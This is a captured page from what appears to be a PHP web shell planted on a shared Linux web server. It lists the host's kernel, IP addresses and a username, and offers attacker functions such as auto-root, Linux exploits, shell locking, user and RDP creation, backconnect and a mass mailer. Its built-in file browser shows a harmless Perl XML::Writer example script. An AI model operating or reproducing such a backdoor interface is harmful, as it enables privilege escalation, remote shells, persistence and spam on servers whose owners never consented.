Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libxml-writer-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
data-mode-sample.pl
535
B
-rwxr-xr-x
directory-as-atom.pl
3.39
KB
-rwxr-xr-x
double-escaping-example.pl
394
B
-rwxr-xr-x
namespace-prefixes.pl
1.36
KB
-rwxr-xr-x
simple-xml.pl
440
B
-rwxr-xr-x
writing-unicode.pl
321
B
-rwxr-xr-x
xml-writer-string.pl
258
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : namespace-prefixes.pl
#!/usr/bin/perl -w # A skeleton Atom document with extensions, to show different # behaviour of namespaces and prefixes use strict; use XML::Writer; my $ATOM = 'http://www.w3.org/2005/Atom'; my $EXT = 'http://www.example.com/feed-extension'; my $EXT2 = 'http://www.example.com/feed-extension-2'; my $EXT3 = 'http://www.example.com/feed-extension-3'; my $w = XML::Writer->new( NAMESPACES => 1, DATA_MODE => 1, # Define prefixes for most of the namespaces PREFIX_MAP => { $ATOM => '', $EXT => 'ext', $EXT2 => 'ext2' }, # Force a declaration for the first extension on the root element FORCED_NS_DECLS => [$EXT] ); $w->comment(' An Atom feed with namespace declarations '); $w->startTag([$ATOM, 'feed']); # The root element will include a declaration for its own namespace # and the contents of FORCED_NS_DECLS $w->dataElement([$ATOM, 'title'], "Feed Title"); # This namespace has already been declared on the root as the default $w->dataElement([$EXT, 'example'], "true"); # This namespace had its name defined but the declaration hasn't appeared yet. # It will be included on demand, on this element. $w->dataElement([$EXT2, 'definitely-an-example'], "true"); # This namespace has no prefix defined - an artificial prefix will be # used (something like __NS1) $w->dataElement([$EXT3, 'most-definitely-an-example'], "true"); $w->endTag([$ATOM, 'feed']); $w->end();
Close